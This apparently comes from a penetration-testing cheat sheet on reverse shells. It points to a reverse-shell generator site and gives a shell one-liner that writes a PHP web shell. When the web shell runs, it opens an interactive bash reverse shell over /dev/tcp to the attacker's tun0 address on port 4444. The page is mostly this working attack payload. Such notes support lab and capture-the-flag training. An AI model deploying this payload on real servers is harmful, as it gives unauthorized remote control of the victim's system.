Exploitation
RevShell
-
RevShell generator
You can use the following website to craft revshell as you wish
nc Revshell
PHP Revshell
Automatically create PHP revshell using interface of your choice
interface="tun0"; echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/$(ip -o -4 addr show $interface | awk '{print $4}' | cut -d/ -f1)/4444 0>&1'\");?>" > /home/parallels/Documents/revshell.php